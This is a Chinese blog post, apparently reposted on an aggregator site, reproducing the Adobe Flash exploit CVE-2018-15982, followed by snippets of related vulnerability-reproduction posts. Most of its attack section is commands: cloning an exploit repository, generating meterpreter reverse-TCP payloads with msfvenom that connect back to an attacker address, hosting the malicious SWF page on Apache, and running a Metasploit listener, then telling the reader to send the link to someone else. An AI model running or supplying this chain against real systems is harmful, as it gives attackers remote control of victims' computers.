2. 程式人生 > >CVE-2018-15982 Adobe Flash 0day漏洞復現

CVE-2018-15982 Adobe Flash 0day漏洞復現

阿新 發佈:2018-12-21

2018年11月29日,360高階威脅應對團隊在全球範圍內第一時間發現一起針對俄羅斯的APT攻擊行動,通過一份俄文內容的醫院員工問卷文件,攜帶最新的Flash 0day漏洞和具有自毀功能的專屬木馬程式,該漏洞(CVE-2018-15982)允許攻擊者惡意製作的Flash物件在受害者的計算機上執行程式碼,從而獲取對系統命令列的訪問許可權。

漏洞記錄

CVE-2018-15982
受影響的版本
Adobe Flash Player <= 31.0.0.153
Adobe Flash Player Installer<= 31.0.0.108
不受影響的版本
Adobe Flash Player 32.0.0.101
Adobe Flash Player Installer 31.0.0.122

漏洞復現

git clone漏洞poc

git clone https://github.com/Ridter/CVE-2018-15982_EXP

在這裡插入圖片描述
msf生成後門

msfvenom -p windows/meterpreter/reverse_tcp_rc4 RC4PASSWORD=ZALE LPORT=4444 LHOST=192.168.1.31 -f raw > 86.bin
msfvenom -p windows/meterpreter/reverse_tcp_rc4 RC4PASSWORD=ZALE LPORT=4444 LHOST=192.168.1.31 -f raw > 64.bin

在這裡插入圖片描述

poc執行並開啟http
生成poc

cp *.bin CVE-2018-15982_EXP/
cd CVE-2018-15982_EXP/
python CVE_2018_15982.py -i 86.bin -I 64.bin

在這裡插入圖片描述
開啟web服務

service apache2 start
cp index.html /var/www/html/
cp exploit.swf /var/www/html/

msf監聽

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp_rc4
set lport 4444
set lhost 192.168.1.31
set RC4PASSWORD zale
run

在這裡插入圖片描述
實施利用
將我們準備好的http://192.168.1.31/index.html發給別人
在這裡插入圖片描述
在這裡插入圖片描述

參考連結:
https://www.t00ls.net/viewthread.php?tid=48991&highlight=CVE-2018-15982%2BAdobe%2BFlash%2B0day漏洞復現

相關漏洞:

該漏洞影響最新版本的 IE 瀏覽器及使用了 IE 核心的應用程式。使用者在瀏覽網頁或開啟 Office 文件時都可能中招,最終被黑客植入後門木馬完全控制電腦。

CVE-2018-8174 漏洞
漏洞復現:
https://www.freebuf.com/vuls/173727.html

相關推薦

CVE-2018-15982 Adobe Flash 0day漏洞復現

2018年11月29日,360高階威脅應對團隊在全球範圍內第一時間發現一起針對俄羅斯的APT攻擊行動,通過一份俄文內容的醫院員工問卷文件,攜帶最新的Flash 0day漏洞和具有自毀功能的專屬木馬程式,該漏洞(CVE-2018-15982)允許攻擊者惡意製作的Flash物件在受害

CVE-2018-15982漏洞復現

  作者:歐根   漏洞資訊:CVE-2018-15982 Adobe已釋出適用於Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新。這些更新解決一個  關鍵的  Adobe Flash Player的漏

曲速未來揭示 :新的CVE-2018-8373在野外發現漏洞利用

區塊鏈安全諮詢公司 曲速未來 訊息:在9月18日,也就是在Trend Micro研究人員釋出分析UAF漏洞CVE-2018-8373的文章後一個月,又發現了一個影響VBScript引擎的新版Windows版本的免費使用(UAF)漏洞CVE-2018-8373的細節,然後發現了另一個漏洞,也是在野外使

CVE-2018-10933 身份驗證繞過漏洞驗證

0x00 事件背景 2018-10-16 libssh釋出更新公告旨在解決CVE-2018-10933的問題 libssh版本0.6及更高版本在服務端程式碼中具有身份驗證繞過漏洞。 通過向服務端提供SSH2_MSG_USERAUTH_SUCCESS訊息來代替服務端期望啟動身份驗證的 SSH2

[漏洞復現] CVE-2018-4878 Flash 0day

黑客 滲透測試 Kali Linux 漏洞復現 Adobe Flash 1、漏洞概述2018年2月1號,Adobe官方發布安全通報(APSA18-01),聲明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。攻擊者通過構造特殊的Flas

Adobe Flash cve-2018-4878 的漏洞復現

metasploit cve-2018-4878 msfconsole 0day 漏洞概述2018年2月1日, Adobe官方發布了Adobe Flash Player系列產品的安全通告(APSA18-01),該0day漏洞編號為CVE-2018-4878,目前最新版本28.0.0.137及其

CVE-2018-4878 flash漏洞復現

先將cve-2018-4878拖入虛擬機器中 使用msfvenom生成shell程式碼 lhost為攻擊機ip地址  lport為自定義埠號 檢視程式碼檔案  進入CVE-2018-4878-master目錄,編輯CVE-2018-4878.py檔案 將

WebLogic任意文件上傳漏洞復現與分析 -【CVE-2018-2894 】

安全 tar lan ide web htm 過濾 eval base CVE-2018-2894 漏洞影響版本:10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3 下載地址:http://download.oracle.com/otn/nt/mi

Vulhub - Ruby On Rails 路徑穿越漏洞CVE-2018-3760)復現

Ruby On Rails 路徑穿越漏洞(CVE-2018-3760) Ruby On Rails在開發環境下使用Sprockets作為靜態檔案伺服器,Ruby On Rails是著名Ruby Web開發框架,Sprockets是編譯及分發靜態資原始檔的Ruby庫。 Sprockets

Flash Player型別混淆嚴重漏洞,成功利用可能導致任意程式碼執行(CVE-2018-15981)

Adobe修補了Flash Player中的一個關鍵漏洞,潛在攻擊者可利用該漏洞在當前使用者的上下文中觸發任意程式碼執行條件。 Flash Confio安全問題出現在Flash Player 31.0.0.148及更早版本中,它會影響在多個平臺上執行的版本,從Windows和macOS到Linux和Chro

CVE-2018-7600 Drupal漏洞原理的簡單分析與復現

0x00元件背景 Drupal是使用PHP語言編寫的開源內容管理框架(CMF),它由內容管理系統(CMS)和PHP開發框架(Framework)共同構成。連續多年榮獲全球最佳CMS大獎,是基於PHP語言最著名的WEB應用程式。 0x01漏洞位置 這裡有個call_user_func

CVE-2018-8174漏洞兩種姿勢的復現

CVE-2018-8174漏洞兩種姿勢的復現 CVE-2018-8174漏洞兩種姿勢的復現 漏洞介紹: 該漏洞影響最新版本的IE瀏覽器及使用了IE核心的應用程式。使用者在瀏覽網頁或開啟Office文件時都可能中招,最終被黑客植入後門木馬完全控制電腦。微軟在4月20日早上確認此漏洞,並於5

WebLogic任意檔案上傳漏洞(CVE-2018-2894)利用復現

環境搭建 參照: https://blog.csdn.net/qq_29647709/article/details/84892582 登入系統 環境啟動後,訪問http://192.1658.1.15:7001/console,即可看到後臺登入頁面。 登入後臺頁面,點選base_

CVE-2018-8420 漏洞復現

影響的 Windows 版本: Microsoft Windows 10 Version 1607 for 32-bit SystemsMicrosoft Windows 10 Version 1607 for x64-based SystemsMicrosoft Windows 10 Version 18

CVE-2018-1111漏洞復現-環境搭建與dhcp命令注入

0×01 前言 2018年5月,在Red Hat Enterprise Linux多個版本的DHCP客戶端軟體包所包含的NetworkManager整合指令碼中發現了命令注入漏洞(CVE-2018-1111),該漏洞目前已經進行了修補。攻擊者可以通過本地網路上的惡意DHCP伺服器或使用惡意的虛假DHCP響應

Ruby On Rails 路徑穿越漏洞CVE-2018-3760)復現

Ruby On Rails 路徑穿越漏洞(CVE-2018-3760) Ruby On Rails在開發環境下使用Sprockets作為靜態檔案伺服器,Ruby On Rails是著名Ruby Web開發框架,Sprockets是編譯及分發靜態資原始檔的Ruby庫。 Sp

DHCP命令執行CVE-2018-1111漏洞復現

DHCP命令執行_CVE-2018-1111漏洞復現 一、漏洞描述 在Red Hat Enterprise Linux多個版本的DHCP客戶端軟體包所包含的NetworkManager整合指令碼中發現了命令注入漏洞,攻擊者可以通過本地網路上的惡意DHCP伺服器或者使用惡意的虛假DHCP響應來利用此漏洞進行

CVE-2018-1273 Spring Data Commons 遠端命令執行漏洞復現

## 一、漏洞描述 Spring Data是一個用於簡化資料庫訪問,並支援雲服務的開源框架,Spring Data Commons是Spring Data下所有子專案共享的基礎框架。Spring Data Commons 在2.0.5及以前版本中,存在一處SpEL表示式注入漏洞,攻擊者可以注入惡意

LNK文件(快捷方式)遠程代碼執行漏洞復現過程(CVE-2017-8464)

abi cred starting compute appear pda info 等級 server 漏洞編號:CVE-2017-8464 漏洞等級:嚴重 漏洞概要:如果用戶打開攻擊者精心構造的惡意LNK文件,則會造成遠程代碼執行。成功利用此漏洞的攻擊者可以獲得與本地

漏洞預警】CVE-2017-8464 震網三代漏洞復現(兩種利用方法)

art cal mage http test ip地址 get for oot 早在6月13日,微軟發布補丁修復編號為CVE-2017-8464的漏洞,本地用戶或遠程攻擊者可以利用該漏洞生成特制的快捷方式,並通過可移動設備或者遠程共享的方式導致遠程代碼執行,追溯到以前,NS